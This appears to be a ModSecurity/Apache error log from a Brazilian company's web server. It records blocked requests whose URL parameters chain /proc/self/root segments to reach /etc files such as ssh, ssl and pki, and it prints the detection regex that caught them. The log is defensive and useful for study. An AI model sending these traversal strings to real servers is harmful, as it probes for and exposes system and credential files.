[Thu Mar 19 04:01:02.708345 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.243.128:48178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufLl_V7PWP6ixUYl6DigAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:01:04.066964 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:48192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufMNa6ubjKNq_cu4YHIAAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:01:05.367241 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:48204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufMeyqAr6etmhZHNorzwAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:01:06.679440 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.243.128:48210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufMhkFeYa1D6dYQnC0rwAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:01:24.874197 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:52616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufRAbLMZ6AikZjR9UlGwAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:26.207039 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:58592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufRuoXxyEfFpUF8f_ZCgAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:27.895038 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:52290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufR-yqAr6etmhZHNor3wAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:29.210989 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:52298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufSda6ubjKNq_cu4YHMAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:30.510824 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:52310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufSta6ubjKNq_cu4YHNQAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:31.786980 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.241.31:52320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufS_-YZRR_7pZ7nDJVEgAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:33.095002 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:52326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufTQbLMZ6AikZjR9UlIgAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:34.451630 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:52340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufTta6ubjKNq_cu4YHQQAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:37.779140 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:52344] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufUda6ubjKNq_cu4YHSAAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:39.084260 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:57696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufU8df6f5d65gmYZQ7CgAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:44.016769 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:57712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufVgkwaGbbGflqUZB8HwAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:45.979175 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:57722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufWf-YZRR_7pZ7nDJVGQAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:47.403376 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:48056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufWwkwaGbbGflqUZB8IQAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:48.714011 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:48066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufXOoXxyEfFpUF8f_ZDwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:53.287238 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:48078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufYQbLMZ6AikZjR9UlMAAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:54.598442 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:48086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufYgkwaGbbGflqUZB8JwAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:55.879483 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:48098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufY-oXxyEfFpUF8f_ZFAAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:01:56.951034 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.244.43:39386] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abufZAbLMZ6AikZjR9UlMQAAAAg"]
